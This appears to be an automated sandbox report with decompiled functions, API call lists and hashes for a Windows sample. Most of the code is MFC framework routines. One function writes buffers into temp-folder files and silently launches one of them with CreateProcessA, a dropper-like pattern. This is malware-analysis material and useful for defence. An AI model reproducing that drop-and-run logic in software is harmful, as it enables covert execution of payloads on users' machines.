      					E009BB018(_t203, _t203, _t245, _t254, CreateSolidBrush((((( *(_t256 + 0x1e) & 0x000000ff) - (_t237 & 0x000000ff) - _t246 >> 0x00000001) + _t237 & 0x000000ff) << 0x00000008 | (( *(_t256 + 0x1d) & 0x000000ff) - ( *(_t256 + 0x15) & 0x000000ff) - _t247 >> 0x00000001) + ( *(_t256 + 0x15) & 0x000000ff) & 0x000000ff) << 0x00000008 | (( *(_t256 + 0x1c) & 0x000000ff) - ( *(_t257 - 0xd) & 0x000000ff) - _t245 >> 0x00000001) +  *(_t257 - 0xd) & 0x000000ff));
      				}
      				E009EE504();
      				_t103 = _t257 - 4;
      				 *(_t257 - 4) =  *(_t257 - 4) | 0xffffffff;
      				 *0xd1160c = 1;
      				return E00AAD30A(E009BAEC1(_t203, _t257 - 0x2c, _t245, _t254, _t256,  *_t103));
      			}
      Instruction address range for the listing above: 0x009bf8b8 to 0x009bfc72

      APIs
      • __EH_prolog3.LIBCMT ref: 009BF8BF
      • GetSysColor.USER32(00000016), ref: 009BF8CE
      • GetSysColor.USER32(0000000F), ref: 009BF8DB
      • GetSysColor.USER32(00000015), ref: 009BF8EE
      • GetSysColor.USER32(0000000F), ref: 009BF8F6
      • GetDeviceCaps.GDI32(?,0000000C), ref: 009BF91C
      • GetSysColor.USER32(0000000F), ref: 009BF92A
      • GetSysColor.USER32(00000010), ref: 009BF934
      • GetSysColor.USER32(00000015), ref: 009BF93E
      • GetSysColor.USER32(00000016), ref: 009BF948
      • GetSysColor.USER32(00000014), ref: 009BF952
      • GetSysColor.USER32(00000012), ref: 009BF95C
      • GetSysColor.USER32(00000011), ref: 009BF966
      • GetSysColor.USER32(00000006), ref: 009BF96D
      • GetSysColor.USER32(0000000D), ref: 009BF974
      • GetSysColor.USER32(0000000E), ref: 009BF97B
      • GetSysColor.USER32(00000005), ref: 009BF982
      • GetSysColor.USER32(00000008), ref: 009BF98C
      • GetSysColor.USER32(00000009), ref: 009BF993
      • GetSysColor.USER32(00000007), ref: 009BF99A
      • GetSysColor.USER32(00000002), ref: 009BF9A1
      • GetSysColor.USER32(00000003), ref: 009BF9A8
      • GetSysColor.USER32(0000001B), ref: 009BF9AF
      • GetSysColor.USER32(0000001C), ref: 009BF9B9
      • GetSysColor.USER32(0000000A), ref: 009BF9C3
      • GetSysColor.USER32(0000000B), ref: 009BF9CD
      • GetSysColor.USER32(00000013), ref: 009BF9D7
      • GetSysColor.USER32(0000001A), ref: 009BF9F1
      • GetSysColorBrush.USER32(00000010), ref: 009BFA0C
      • GetSysColorBrush.USER32(00000014), ref: 009BFA23
      • GetSysColorBrush.USER32(00000005), ref: 009BFA35
      • CreateSolidBrush.GDI32(?), ref: 009BFA59
      • CreateSolidBrush.GDI32(?), ref: 009BFA75
      • CreateSolidBrush.GDI32(?), ref: 009BFA91
      • CreateSolidBrush.GDI32(?), ref: 009BFAAD
      • CreateSolidBrush.GDI32(?), ref: 009BFAC9
      • CreateSolidBrush.GDI32(?), ref: 009BFAE5
      • CreateSolidBrush.GDI32(?), ref: 009BFB01
      • CreatePen.GDI32(00000000,00000001,00000000), ref: 009BFB2A
      • CreatePen.GDI32(00000000,00000001,00000000), ref: 009BFB4D
      • CreatePen.GDI32(00000000,00000001,00000000), ref: 009BFB70
      • CreateSolidBrush.GDI32(?), ref: 009BFBF4
      • CreatePatternBrush.GDI32(00000000), ref: 009BFC35
        • Part of subcall function 009BB072: DeleteObject.GDI32(00000000), ref: 009BB081
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
      • String ID:
      • API String ID: 3754413814-0
      • Opcode ID: c974948d1f8398607ed65cdd9d9b770009c8103d4669c6ca8ceb0350ba922163
      • Instruction ID: f2dd04c47b048aad94ccee4065eedaa2dda52ae3c4fca705bb37954dfd378be2
      • Opcode Fuzzy Hash: c974948d1f8398607ed65cdd9d9b770009c8103d4669c6ca8ceb0350ba922163
      • Instruction Fuzzy Hash: 80B17A70900B449ADB34BF71CD55BEBBBE0AF81710F00892EE19B865D1EBB5A948DF50
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 116 9aeaf8-9aeb31 call aad29b call 9bcdbd 121 9aeb38-9aeb3c 116->121 122 9aeb33 call 9b8782 116->122 124 9aeb3e-9aeb4c CallNextHookEx 121->124 125 9aeb51-9aeb67 call 9bd77f 121->125 122->121 126 9aed37-9aed3c call aad31e 124->126 130 9aeb69-9aeb70 125->130 131 9aeb7e-9aeb85 125->131 133 9aeb76-9aeb78 130->133 134 9aed05-9aed26 CallNextHookEx 130->134 135 9aebd2-9aebd4 131->135 136 9aeb87-9aeb95 GetClassLongA 131->136 133->131 133->134 138 9aed28-9aed31 UnhookWindowsHookEx 134->138 139 9aed35 134->139 140 9aec30-9aec38 135->140 141 9aebd6-9aec11 call 9bd7c9 call 9ac958 SetWindowLongA 135->141 136->134 137 9aeb9b-9aeba3 136->137 142 9aebbd-9aebcc call 9ab7f1 137->142 143 9aeba5-9aebba GlobalGetAtomNameA 137->143 138->139 139->126 144 9aec3a-9aec72 call aab3f0 call 9ab523 140->144 145 9aec74-9aec87 GetClassLongA 140->145 167 9aec13 141->167 168 9aec15-9aec2b call 9bcf01 141->168 142->134 142->135 143->142 144->145 162 9aec8b-9aeca0 GetClassNameA 144->162 150 9aecb9-9aecc7 GetWindowLongA 145->150 151 9aec89 145->151 150->134 152 9aecc9-9aecda GetPropA 150->152 151->134 152->134 156 9aecdc-9aecee SetPropA GetPropA 152->156 156->134 159 9aecf0-9aecff GlobalAddAtomA SetWindowLongA 156->159 159->134 162->150 163 9aeca2-9aecb7 call aad9bc 162->163 163->134 163->150 167->168 168->134
      C-Code - Quality: 93%
      			E009AEAF8(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
      				intOrPtr _t53;
      				signed int _t55;
      				signed int _t58;
      				long _t59;
      				signed int _t63;
      				void* _t65;
      				signed int _t71;
      				signed int _t73;
      				signed int _t75;
      				long _t82;
      				signed int _t85;
      				signed short _t86;
      				signed int _t87;
      				int _t93;
      				void* _t105;
      				void* _t107;
      				long* _t109;
      				long _t111;
      				signed int _t112;
      				CHAR* _t113;
      				intOrPtr _t114;
      				void* _t117;
      				void* _t120;
      				intOrPtr _t121;
      
      				_t120 = __eflags;
      				_t106 = __edi;
      				_t105 = __edx;
      				_push(0x148);
      				E00AAD29B(0xac80b6, __ebx, __edi, __esi);
      				_t111 =  *(_t117 + 0x10);
      				_t93 =  *(_t117 + 0xc);
      				_push(E009AB424);
      				 *(_t117 - 0x120) = _t111;
      				_t53 = E009BCDBD(_t93, 0xd0fd04, __edi, _t111, _t120);
      				_t121 = _t53;
      				_t96 = 0 | _t121 == 0x00000000;
      				 *((intOrPtr*)(_t117 - 0x11c)) = _t53;
      				if(_t121 == 0) {
      					_t53 = E009B8782(_t96);
      				}
      				if( *(_t117 + 8) == 3) {
      					_t107 =  *_t111;
      					_t112 =  *(_t53 + 0x14);
      					_t55 =  *(E009BD77F(_t93, _t107, _t112, __eflags) + 0x14) & 0x000000ff;
      					 *(_t117 - 0x124) = _t55;
      					__eflags = _t112;
      					if(_t112 != 0) {
      						L7:
      						__eflags =  *0xd101e4;
      						if( *0xd101e4 == 0) {
      							L12:
      							__eflags = _t112;
      							if(__eflags == 0) {
      								__eflags =  *0xd0fb64;
      								if( *0xd0fb64 != 0) {
      									L18:
      									__eflags = (GetClassLongA(_t93, 0xffffffe0) & 0x0000ffff) -  *0xd0fb64; // 0x8000
      									if(__eflags != 0) {
      										L22:
      										_t58 = GetWindowLongA(_t93, 0xfffffffc);
      										 *(_t117 - 0x14) = _t58;
      										__eflags = _t58;
      										if(_t58 != 0) {
      											_t113 = "AfxOldWndProc423";
      											_t63 = GetPropA(_t93, _t113);
      											__eflags = _t63;
      											if(_t63 == 0) {
      												SetPropA(_t93, _t113,  *(_t117 - 0x14)); // executed
      												_t65 = GetPropA(_t93, _t113);
      												__eflags = _t65 -  *(_t117 - 0x14);
      												if(_t65 ==  *(_t117 - 0x14)) {
      													GlobalAddAtomA(_t113); // executed
      													SetWindowLongA(_t93, 0xfffffffc, E009AE991);
      												}
      											}
      										}
      										L26:
      										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
      										_t59 = CallNextHookEx( *(_t106 + 0x28), 3, _t93,  *(_t117 - 0x120));
      										__eflags =  *(_t117 - 0x124);
      										_t111 = _t59;
      										if( *(_t117 - 0x124) != 0) {
      											UnhookWindowsHookEx( *(_t106 + 0x28));
      											_t49 = _t106 + 0x28;
      											 *_t49 =  *(_t106 + 0x28) & 0x00000000;
      											__eflags =  *_t49;
      										}
      										goto L29;
      									}
      									goto L26;
      								}
      								_t114 = 0x30;
      								E00AAB3F0(_t117 - 0x154, 0, _t114);
      								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
      								_push(_t117 - 0x154);
      								_t115 = "#32768";
      								_push("#32768");
      								_push(0);
      								_t71 = E009AB523(_t96, "#32768", __eflags);
      								 *0xd0fb64 = _t71;
      								__eflags = _t71;
      								if(_t71 == 0) {
      									_t73 = GetClassNameA(_t93, _t117 - 0x118, 0x100);
      									__eflags = _t73;
      									if(_t73 == 0) {
      										goto L22;
      									}
      									 *((char*)(_t117 - 0x19)) = 0;
      									_t75 = E00AAD9BC(_t117 - 0x118, _t115);
      									__eflags = _t75;
      									if(_t75 == 0) {
      										goto L26;
      									}
      									goto L22;
      								}
      								goto L18;
      							}
      							E009BD7C9(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
      							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
      							E009AC958(_t112, _t105, _t93);
      							 *((intOrPtr*)( *_t112 + 0x50))();
      							_t109 =  *((intOrPtr*)( *_t112 + 0xfc))();
      							_t82 = SetWindowLongA(_t93, 0xfffffffc, E009AD67F);
      							__eflags = _t82 - E009AD67F;
      							if(_t82 != E009AD67F) {
      								 *_t109 = _t82;
      							}
      							_t83 =  *((intOrPtr*)(_t117 - 0x11c));
      							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
      							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
      							E009BCF01(_t83, _t117 - 0x18);
      							goto L26;
      						}
      						_t85 = GetClassLongA(_t93, 0xffffffe6);
      						__eflags = _t85 & 0x00010000;
      						if((_t85 & 0x00010000) != 0) {
      							goto L26;
      						}
      						_t86 =  *(_t107 + 0x28);
      						__eflags = _t86 - 0xffff;
      						if(_t86 <= 0xffff) {
      							 *(_t117 - 0x18) = 0;
      							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
      							_t86 = _t117 - 0x18;
      						}
      						_t87 = E009AB7F1(_t86, "ime");
      						_pop(_t96);
      						__eflags = _t87;
      						if(_t87 == 0) {
      							goto L26;
      						} else {
      							goto L12;
      						}
      					}
      					__eflags =  *(_t107 + 0x20) & 0x40000000;
      					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
      						goto L26;
      					}
      					__eflags = _t55;
      					if(_t55 != 0) {
      						goto L26;
      					}
      					goto L7;
      				} else {
      					CallNextHookEx( *(_t53 + 0x28),  *(_t117 + 8), _t93, _t111);
      					L29:
      					return E00AAD31E(_t93, _t106, _t111);
      				}
      			}
      Instruction address range for the listing above: 0x009aeaf8 to 0x009aed3c

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009AEB02
        • Part of subcall function 009BCDBD: __EH_prolog3.LIBCMT ref: 009BCDC4
      • CallNextHookEx.USER32(?,?,?,?), ref: 009AEB46
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetClassLongA.USER32 ref: 009AEB8A
      • GlobalGetAtomNameA.KERNEL32 ref: 009AEBB4
      • SetWindowLongA.USER32 ref: 009AEC09
      • _memset.LIBCMT ref: 009AEC47
        • Part of subcall function 009AB523: ActivateActCtx.KERNEL32(?,?,00B0BA90,00000010), ref: 009AB543
      • GetClassLongA.USER32 ref: 009AEC77
      • GetClassNameA.USER32(?,?,00000100), ref: 009AEC98
      • GetWindowLongA.USER32 ref: 009AECBC
      • GetPropA.USER32 ref: 009AECD6
      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 009AECE1
      • GetPropA.USER32 ref: 009AECE9
      • GlobalAddAtomA.KERNEL32 ref: 009AECF1
      • SetWindowLongA.USER32 ref: 009AECFF
      • CallNextHookEx.USER32(?,00000003,?,?), ref: 009AED17
      • UnhookWindowsHookEx.USER32(?), ref: 009AED2B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$ActivateException@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
      • String ID: #32768$AfxOldWndProc423$ime
      • API String ID: 2222608385-4034971020
      • Opcode ID: 8c2b4c5d883666c45e780aa1165c86d4aeb0e513ad6a94a47dba36d3b18d97af
      • Instruction ID: b83ae122627e14389b5089c22fb774b6629b058b28b05d36cee7af71190df64e
      • Opcode Fuzzy Hash: 8c2b4c5d883666c45e780aa1165c86d4aeb0e513ad6a94a47dba36d3b18d97af
      • Instruction Fuzzy Hash: 4B51D07140121AABCB21AF64CD49BEE7BB8EF0A321F150555F406A72D1DB34DD41CBE4
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 81%
      			E009A3DF0(intOrPtr* __ecx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16) {
      				CHAR* _v8;
      				char _v16;
      				signed int _v20;
      				char _v279;
      				char _v280;
      				char _v539;
      				char _v540;
      				char _v799;
      				char _v800;
      				char _v1059;
      				char _v1060;
      				void _v1168;
      				CHAR* _v1172;
      				CHAR* _v1176;
      				struct _STARTUPINFOA _v1244;
      				struct _PROCESS_INFORMATION _v1260;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t54;
      				signed int _t55;
      				CHAR* _t89;
      				void* _t90;
      				void* _t94;
      				void* _t130;
      				void* _t131;
      				intOrPtr* _t135;
      				void* _t136;
      				signed int _t138;
      				void* _t139;
      				void* _t142;
      				void* _t145;
      
      				_t145 = __eflags;
      				_push(0xffffffff);
      				_push(0xac7b1e);
      				_push( *[fs:0x0]);
      				_t54 =  *0xd0c910; // 0x3a0e8b0c
      				_t55 = _t54 ^ _t138;
      				_v20 = _t55;
      				_push(_t55);
      				 *[fs:0x0] =  &_v16;
      				_t135 = __ecx;
      				_v1176 = _a8;
      				_v1172 = _a12;
      				_v540 = 0;
      				E00AAB3F0( &_v539, 0, 0x103);
      				_v280 = 0;
      				E00AAB3F0( &_v279, 0, 0x103);
      				_v1060 = 0;
      				E00AAB3F0( &_v1059, 0, 0x103);
      				_v800 = 0;
      				E00AAB3F0( &_v799, 0, 0x103);
      				GetTempPathA(0x104,  &_v540);
      				lstrcpyA( &_v280,  &_v540);
      				lstrcpyA( &_v1060,  &_v540);
      				lstrcpyA( &_v800,  &_v540);
      				_t130 = lstrcatA;
      				lstrcatA( &_v280, _a4);
      				lstrcatA( &_v1060, _v1176);
      				lstrcatA( &_v800, _v1172);
      				E009A3C20(_t145,  &_v280,  *_t135,  *((intOrPtr*)(_t135 + 0x10)), 0); // executed
      				E009A3C20(_t145,  &_v1060,  *((intOrPtr*)(_t135 + 4)),  *((intOrPtr*)(_t135 + 0x14)), 1); // executed
      				_t126 =  &_v800;
      				E009A3C20(_t145,  &_v800,  *((intOrPtr*)(_t135 + 0xc)),  *((intOrPtr*)(_t135 + 0x1c)), 0); // executed
      				E00AAB3F0( &_v1244, 0, 0x44);
      				_t142 = _t139 - 0x4dc + 0x3c;
      				_v1244.cb = 0x44;
      				_v1244.dwFlags = 1;
      				_v1244.wShowWindow = 0;
      				_t146 = _a16;
      				if(_a16 != 0) {
      					memcpy( &_v1168, 0xad6fb0, 0x1a << 2);
      					_t130 = 0xad6fe4;
      					asm("movsw");
      					_t89 = E009A6291(_t146, 1);
      					_t142 = _t142 + 0x10;
      					_v1172 = _t89;
      					_v8 = 0;
      					_t147 = _t89;
      					if(_t89 == 0) {
      						_t90 = 0;
      						__eflags = 0;
      					} else {
      						_t90 = E009A4040(_t89);
      					}
      					_t126 =  &_v1168;
      					_v8 = 0xffffffff;
      					E009A41D0(_t90,  &_v1168,  &_v1168);
      				}
      				E009A13B0(_t126, _t130, _t147,  &_v280); // executed
      				CreateProcessA(0,  &_v280, 0, 0, 0, 0, 0, 0,  &_v1244,  &_v1260); // executed
      				 *[fs:0x0] = _v16;
      				_pop(_t131);
      				_pop(_t136);
      				_pop(_t94);
      				return E00AAB46A(1, _t94, _v20 ^ _t138,  &_v1244, _t131, _t136);
      			}
      Instruction address range for the listing above: 0x009a3df0 to 0x009a403b

      APIs
      • _memset.LIBCMT ref: 009A3E4A
      • _memset.LIBCMT ref: 009A3E64
      • _memset.LIBCMT ref: 009A3E7E
      • _memset.LIBCMT ref: 009A3E98
      • GetTempPathA.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EAC
      • lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EC6
      • lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3ED6
      • lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EE6
      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EF6
      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F06
      • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F16
        • Part of subcall function 009A3C20: _memset.LIBCMT ref: 009A3C6A
        • Part of subcall function 009A3C20: GetTickCount.KERNEL32 ref: 009A3CE2
        • Part of subcall function 009A3C20: _rand.LIBCMT ref: 009A3CF3
        • Part of subcall function 009A3C20: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009A3D26
        • Part of subcall function 009A3C20: _memmove.LIBCMT ref: 009A3D34
        • Part of subcall function 009A3C20: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009A3DC1
      • _memset.LIBCMT ref: 009A3F6A
      • CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 009A4015
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset$lstrcatlstrcpy$AllocCountCreateIos_base_dtorPathProcessTempTickVirtual_malloc_memmove_randstd::ios_base::_
      • String ID: D
      • API String ID: 2126544836-2746444292
      • Opcode ID: 3d42653da93c1914851d02a4be2a99be458a179713ce9bc12cd18eef9fffdcf4
      • Instruction ID: f2ab8c39f0180e4d6292935fe7472066bfb7c00d4315632b66af50c3dd44fd70
      • Opcode Fuzzy Hash: 3d42653da93c1914851d02a4be2a99be458a179713ce9bc12cd18eef9fffdcf4
      • Instruction Fuzzy Hash: 8F5145B295021CABDB24DB64CC41FDEB3B8EF89700F00459AF619A7181DB746B45CFA5
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Basic blocks (node: address range, calls; successors after ->; the executed/not-executed colouring of the rendered graph is not recoverable here):
      • 202: 9bc9bb-9bc9dc EnterCriticalSection -> 203, 204
      • 203: 9bc9eb-9bc9f0 -> 206, 207
      • 204: 9bc9de-9bc9e5 -> 203, 205
      • 205: 9bcaa9-9bcaac -> 209, 210
      • 206: 9bca0d-9bca15 -> 211, 212
      • 207: 9bc9f2-9bc9f5 -> 208
      • 208: 9bc9f8-9bc9fb -> 214, 215
      • 209: 9bcaae-9bcab1 -> 210
      • 210: 9bcab4-9bcad2 LeaveCriticalSection
      • 211: 9bca2c-9bca50 GlobalHandle, GlobalUnlock, call 9b9e19, GlobalReAlloc -> 219
      • 212: 9bca17-9bca2a call 9b9e19, GlobalAlloc -> 219
      • 214: 9bc9fd-9bca03 -> 208, 215
      • 215: 9bca05-9bca07 -> 205, 206
      • 219: 9bca56-9bca58 -> 220, 221
      • 220: 9bca5a-9bca5f -> 222, 223
      • 221: 9bca7d-9bcaa6 GlobalLock, call aab3f0 -> 205
      • 222: 9bca6f-9bca78 LeaveCriticalSection, call 9b874a -> 221
      • 223: 9bca61-9bca69 GlobalHandle, GlobalLock -> 222
      C-Code - Quality: 88%
      			E009BC9BB(void* __ecx) {
      				struct _CRITICAL_SECTION* _v8;
      				void* _v12;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				struct _CRITICAL_SECTION* _t34;
      				void* _t35;
      				void* _t36;
      				long _t38;
      				void* _t39;
      				long _t51;
      				signed char* _t53;
      				signed int _t56;
      				signed int _t57;
      				void* _t61;
      				signed int _t68;
      				void* _t72;
      
      				_t59 = __ecx;
      				_push(__ecx);
      				_push(__ecx);
      				_t72 = __ecx;
      				_t1 = _t72 + 0x1c; // 0x1c
      				_t34 = _t1;
      				_v8 = _t34;
      				EnterCriticalSection(_t34);
      				_t56 =  *(_t72 + 4);
      				_t68 =  *(_t72 + 8);
      				if(_t68 >= _t56 || ( *( *(_t72 + 0x10) + _t68 * 8) & 0x00000001) != 0) {
      					_t68 = 1;
      					if(_t56 <= 1) {
      						L7:
      						_t35 =  *(_t72 + 0x10);
      						_t57 = _t56 + 0x20;
      						_t83 = _t35;
      						if(_t35 != 0) {
      							_t36 = GlobalHandle(_t35);
      							_v12 = _t36;
      							GlobalUnlock(_t36);
      							_t38 = E009B9E19(_t57, _t59, _t68, _t72, __eflags, _t57, 8);
      							_t61 = 0x2002;
      							_t39 = GlobalReAlloc(_v12, _t38, ??);
      						} else {
      							_t51 = E009B9E19(_t57, _t59, _t68, _t72, _t83, _t57, 8);
      							_pop(_t61);
      							_t39 = GlobalAlloc(2, _t51); // executed
      						}
      						if(_t39 == 0) {
      							_t72 =  *(_t72 + 0x10);
      							if(_t72 != 0) {
      								GlobalLock(GlobalHandle(_t72));
      							}
      							LeaveCriticalSection(_v8);
      							_t39 = E009B874A(_t61);
      						}
      						_v12 = GlobalLock(_t39);
      						E00AAB3F0(_t40 +  *(_t72 + 4) * 8, 0, _t57 -  *(_t72 + 4) << 3);
      						 *(_t72 + 4) = _t57;
      						 *(_t72 + 0x10) = _v12;
      					} else {
      						_t53 =  *(_t72 + 0x10) + 8;
      						while(( *_t53 & 0x00000001) != 0) {
      							_t68 = _t68 + 1;
      							_t53 =  &(_t53[8]);
      							if(_t68 < _t56) {
      								continue;
      							}
      							break;
      						}
      						if(_t68 >= _t56) {
      							goto L7;
      						}
      					}
      				}
      				if(_t68 >=  *((intOrPtr*)(_t72 + 0xc))) {
      					 *((intOrPtr*)(_t72 + 0xc)) = _t68 + 1;
      				}
      				 *( *(_t72 + 0x10) + _t68 * 8) =  *( *(_t72 + 0x10) + _t68 * 8) | 0x00000001;
      				 *(_t72 + 8) = _t68 + 1;
      				LeaveCriticalSection(_v8);
      				return _t68;
      			}

      Instruction addresses (per-line address column of the decompiler view, detached by extraction): 0x009bc9bb .. 0x009bcad2

      APIs
      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BC9CE
      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C), ref: 009BCA24
      • GlobalHandle.KERNEL32(?), ref: 009BCA2D
      • GlobalUnlock.KERNEL32(00000000,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BCA37
      • GlobalReAlloc.KERNEL32 ref: 009BCA50
      • GlobalHandle.KERNEL32(?), ref: 009BCA62
      • GlobalLock.KERNEL32 ref: 009BCA69
      • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,009BCE11,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BCA72
      • GlobalLock.KERNEL32 ref: 009BCA7E
      • _memset.LIBCMT ref: 009BCA98
      • LeaveCriticalSection.KERNEL32(?), ref: 009BCAC6
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
      • String ID:
      • API String ID: 496899490-0
      • Opcode ID: c16d0471b0c387aa37e07f21036be6245352e806339bfc277239aeee06a2b6d4
      • Instruction ID: d4e277c3a12652ca8b6cf7e7a68d207514a0d267c003b147dc13b861343f8ff8
      • Opcode Fuzzy Hash: c16d0471b0c387aa37e07f21036be6245352e806339bfc277239aeee06a2b6d4
      • Instruction Fuzzy Hash: 64319AB1A00708AFD720DFA8DD89B9ABBE9FF84714B05892AE552D7251DB30F8458B10
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 97%
      			E009AE991(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t36;
      				long _t42;
      				void* _t43;
      				void* _t46;
      				long _t61;
      				void* _t68;
      				struct HWND__* _t70;
      				void* _t73;
      
      				_t68 = __edx;
      				_push(0x4c);
      				E00AAD2D1(0xac8089, __ebx, __edi, __esi);
      				_t70 =  *(_t73 + 8);
      				_t61 =  *(_t73 + 0x14);
      				_t72 = "AfxOldWndProc423";
      				 *(_t73 - 0x38) = _t70;
      				 *(_t73 - 0x3c) = _t61;
      				 *(_t73 - 0x30) = GetPropA(_t70, _t72);
      				_t36 =  *(_t73 + 0xc) - 6;
      				 *(_t73 - 0x28) = 0;
      				 *((intOrPtr*)(_t73 - 4)) = 0;
      				 *(_t73 - 0x2c) = 1;
      				if(_t36 == 0) {
      					_t72 = E009AC90B(_t61, 0, _t68, _t61);
